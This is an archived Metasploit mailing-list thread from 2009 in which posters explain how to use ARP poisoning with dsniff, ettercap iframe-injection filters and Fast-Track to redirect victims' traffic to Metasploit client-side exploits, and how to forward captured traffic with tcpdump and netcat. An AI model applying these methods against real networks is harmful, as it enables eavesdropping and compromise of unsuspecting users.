Metasploit mailing list archives
ARP Poisoning
From: wullie19 at ntlworld.com (rogue)
Date: Fri, 17 Apr 2009 07:44:07 +0100
Hi there, I'm not sure about doing this on a pivot(that's a trick I really would like to know) but I guess it comes down to the OS's involved. To redirect some one via arp poisoning to metasploit client side attack you can use ettercap with a custom filter to swap img tags for iframe's ponting at the attack machine. Or alternatively you can use fasttrack mass client side attack which sets up a web server creates index.htm full of iframes pointing at waiting metasploit client side exploits and uses arp poisoning to redirect the victims to our attack machine. -rogue
Hmm. Well, maybe. Firstly, I went back and re-read your original question. You asked about traffic to a specific destination host. The methods I outlined will redirect *all* the victim's traffic to the other machine- you'll then have to decide what to do with it. Check out the whole dsniff suite- you can do a lot with it besides the redirection, but it's mainly MITM/eavesdropping attacks. If you want to, say, redirect all the victim's traffic through yourself and serve up a browser attack back to the target on port 80 with Metasploit, I think that could work. Actually, that's something I've been meaning to try- if anyone has done this, I'd like to hear about it. Now then: in you scenario below: is the pivot machine on the same subnet as the victim? If so, you can arp poison the target and save a copy of the traffic locally on the pivot machine (tcpdump), or encapsulate and forward a copy to your off-subnet attack machine. Something like tcpdump eth0 | netcat <options> might work for this. There may be better tools, but I don't know what they are. If the target machine is compromised, and that technique works, you could use that to get it off-subnet directly. Without knowing more about what you're trying to do and the OSes involved that's about all I can come up with. J-. Bryan Richardson wrote:Hey Jim, Thanks for the response. That's great news. One quick question... if my attack machine is on a different subnet, but I'm pivoting through another compromised machine, is there a way to still make this work? -- Bryan On Thu, Apr 16, 2009 at 9:33 AM, jim <jimbo at abs.net <mailto:jimbo at abs.net>> wrote: If the host is already compromised, you can use the "arp" command to make a static arp entry. If it's not, you can use the dsniff utility to poison its arp cache. Note that this is a layer 2 redirection so the machine to which you're redirecting traffic must be on the same IP subnet. Jim Bryan Richardson wrote: Hello All, I've poked around a little bit in the code and on the mailing list, but I haven't found an answer to a question I have: Is it possible to conduct ARP poisoning (or some other act) so as to direct traffic from a compromised host destined for a particular IP address to the attacker's machine? -- Thanks! Bryan _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- ARP Poisoning Bryan Richardson (Apr 16)
- ARP Poisoning jim (Apr 16)
- ARP Poisoning Bryan Richardson (Apr 16)
- ARP Poisoning jim (Apr 16)
- ARP Poisoning rogue (Apr 16)
- server/capture/smb issue jeffs (Apr 18)
- ARP Poisoning Bryan Richardson (Apr 16)
- ARP Poisoning jim (Apr 16)